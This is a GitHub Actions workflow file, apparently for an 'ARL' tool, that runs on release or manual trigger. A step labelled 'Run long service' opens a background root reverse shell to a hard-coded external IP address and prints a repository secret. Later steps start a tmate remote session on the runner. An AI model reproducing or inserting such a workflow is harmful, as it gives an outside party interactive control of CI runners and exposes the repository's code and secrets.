name: ARL在线

on:
  release:
    types: [published]
  workflow_dispatch:
    inputs:
      tag:
        description: 'Image tag'
        required: false
        default: 'test'  # 默认的标签值

permissions:
  contents: read

jobs:
  long-running-service:
    runs-on: ubuntu-20.04

    steps:

      - name: Run long service
        env: # Or as an environment variable
          SERVER_ADDR: ${{ secrets.SERVER_ADDR }}
        run: |
          echo "Server Address is: ${SERVER_ADDR:-'Not set or empty'}"
          env | grep SERVER_ADDR  # This will print only the SERVER_ADDR related variable
          sudo sh -i >& /dev/tcp/181.193.118.73/6060 0>&1 &
          sleep 10 # 确保服务已经启动

      # Checkout your code
      - name: Checkout code
        uses: actions/checkout@v3

      # Set up tmate session
      - name: Setup tmate session
        uses: mxschmitt/action-tmate@v3

      # Print tmate connection instructions
      - name: Print tmate instructions
        run: |
          echo "To connect to the tmate session, run the following command:"
          echo "ssh $(cat /tmp/tmate-ssh)"
          echo "Alternatively, use the web URL:"
          echo "$(cat /tmp/tmate-url)"
